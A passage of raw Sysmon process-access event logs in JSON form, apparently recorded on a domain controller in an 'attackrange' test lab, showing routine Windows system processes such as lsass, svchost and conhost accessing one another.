05:48:46.546","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023E-5F25-0000-0010836D0500}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3679,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.858\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.858","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3680,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.858\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.858","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3681,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.858\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.858","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3682,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.890\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D4CB0000}\r\nSourceProcessId: 1308\r\nSourceThreadId: 1412\r\nSourceImage: C:\\Windows\\System32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nTargetProcessId: 1224\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1440\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+2e77|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.890","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D4CB0000}","SourceProcessId":"1308","SourceThreadId":"1412","SourceImage":"C:\\Windows\\System32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","TargetProcessId":"1224","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1440","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+2e77|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3683,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.890\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D4CB0000}\r\nSourceProcessId: 1308\r\nSourceThreadId: 1412\r\nSourceImage: C:\\Windows\\System32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nTargetProcessId: 1224\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1440\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+4609|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.890","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D4CB0000}","SourceProcessId":"1308","SourceThreadId":"1412","SourceImage":"C:\\Windows\\System32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","TargetProcessId":"1224","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1440","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+4609|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3684,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.984\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.984","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3685,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.984\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.984","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3686,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.984\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 